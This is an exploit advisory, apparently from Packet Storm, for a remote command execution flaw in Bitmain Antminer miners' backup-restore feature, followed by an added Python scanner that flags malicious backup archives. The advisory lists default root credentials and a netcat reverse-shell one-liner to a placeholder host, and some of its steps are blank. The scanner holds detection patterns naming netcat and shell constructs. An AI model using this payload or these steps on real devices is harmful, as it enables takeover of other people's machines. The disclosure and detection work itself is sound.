Bitmain Antminer D3/L3+/S9 Remote Command Execution

Type packetstorm
Reporter Corrado Liotta
Modified 2018-05-27T00:00:00


# Exploit Title: Bitmain Antminer D3, L3+, and S9 devices allow Remote Command Execution  
# Google Dork: N/A  
# Date: 27/05/2018  
# Exploit Author: Corrado Liotta  
# Vendor Homepage:  
# Software Link: N/A  
# Version: Antminer - D3, L3+, S9, and other  
# Tested on: Windows/Linux  
# CVE : CVE-2018-11220  
The software used by the miners produced by Bitmain (AntMiner) is  
affected by a remote code execution vulnerability: the "Restore Backup"  
functionality of the administration portal can be used to execute  
commands on the system. This would allow a malicious user with  
valid credentials to access the entire file system with administrative  
Log in to the Antminer Configuration Portal (default credentials: root/root)  
1) Create a file named:  
2) Insert inside:  
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc your_ip your_port  
3) Generate archive by inserting the file created before:  
4) Launch netcat and upload the file:  
nc -vv -l -p port  
system --> upgrade --> upload archive
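
A defensive check for the restore path described above, added here as an example (not code from the advisory or from Bitmain): it inspects an uploaded backup archive in memory and flags members containing the shell constructs from the quoted command before anything is unpacked. The tar format, the function names and the sample file names are assumptions; the advisory does not state the archive layout.

```python
import io
import re
import tarfile

# Shell constructs drawn from the command quoted in the advisory (not exhaustive).
SUSPICIOUS = {
    "named pipe creation": re.compile(rb"\bmkfifo\b"),
    "interactive shell": re.compile(rb"/bin/(?:ba)?sh\s+-i\b"),
    "netcat invocation": re.compile(rb"(?:^|[;|&\s])(?:nc|ncat|netcat)\s"),
    "stderr merged into pipe": re.compile(rb"2>&1\s*\|"),
}

def scan_backup(archive_bytes, max_size=1 << 20):
    """Return {member_name: [reasons]} for members that should block a restore."""
    findings = {}
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r:*") as tar:
        for m in tar:
            reasons = []
            # Absolute paths, parent-directory hops and links are never valid here.
            if m.name.startswith("/") or ".." in m.name.split("/"):
                reasons.append("path escapes extraction directory")
            if m.issym() or m.islnk():
                reasons.append("link member")
            if m.isfile() and m.size > max_size:
                reasons.append("oversized member")
            elif m.isfile():
                data = tar.extractfile(m).read()
                reasons += [label for label, rx in SUSPICIOUS.items() if rx.search(data)]
            if reasons:
                findings[m.name] = reasons
    return findings

def build_sample_archive(files):
    """Build an in-memory tar.gz from {name: bytes}; constructed test input only."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, content in files.items():
            info = tarfile.TarInfo(name)
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()

if __name__ == "__main__":
    # Constructed sample: file names are hypothetical, the command is the one on this page.
    cmd = b"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc your_ip your_port\n"
    sample = build_sample_archive({"network.conf": b"hostname=antMiner\n", "sample.conf": cmd})
    for name, reasons in scan_backup(sample).items():
        print(f"REJECT {name}: {', '.join(reasons)}")
```

A restore handler would call `scan_backup` on the upload and refuse the archive when the result is non-empty; pattern matching of this kind is a screening layer, not a substitute for changing the default credentials and restricting access to the portal.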